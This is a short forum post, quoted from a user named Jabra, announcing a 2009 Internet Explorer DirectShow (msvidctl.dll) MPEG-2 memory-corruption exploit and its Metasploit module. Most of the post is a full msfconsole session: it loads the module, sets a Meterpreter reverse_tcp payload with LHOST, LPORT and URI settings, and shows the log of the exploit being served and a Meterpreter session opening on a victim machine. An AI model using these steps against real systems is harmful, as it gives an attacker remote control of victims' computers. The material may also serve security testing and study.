Originally Posted by Jabra
There is a new IE exploit that has been recently released into the wild. The exploit is for DirectShow (msvidctl.dll) MPEG-2. The exploit utilizes an ActiveX control in addition to a GIF file include, to perform a memory corruption attack. The vulnerability affects users of both IE 6 and IE7.
Today, the exploit was added to the Metasploit framework by HD Moore (the author of Metasploit). The module was written by Trancer which was posted at http://www.rec-sec.com/2009/07/06/ms-directshow-msvidctl-exploit/.
Thus far, I have verified the exploit to be working on IE 7. Since the exploit works by using an ActiveX control, the victim will need to allow the ActiveX control to run.
=[ msf v3.3-dev + -- --=[ 384 exploits - 234 payloads + -- --=[ 20 encoders - 7 nops =[ 162 aux msf > use windows/browser/msvidctl_mpeg2 msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.50 LHOST => 192.168.1.50 msf exploit(msvidctl_mpeg2) > set LPORT 443 LPORT => 443 msf exploit(msvidctl_mpeg2) > set URIPATH /test.html URIPATH => /test.html msf exploit(msvidctl_mpeg2) > set SRVPORT 9000 SRVPORT => 9000 msf exploit(msvidctl_mpeg2) > exploit [*] Exploit running as background job. msf exploit(msvidctl_mpeg2) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:9000/test.html [*] Local IP: http://192.168.1.50:9000/test.html [*] Server started. [*] Sending HTML to 192.168.1.100:1091… [*] Sending exploit to 192.168.1.100:1091… [*] Sending GIF to 192.168.1.100:1091… [*] Transmitting intermediate stager for over-sized stage…(216 bytes) [*] Sending stage (205824 bytes) [*] Meterpreter session 1 opened (192.168.1.50:443 -> 192.168.1.100:1092)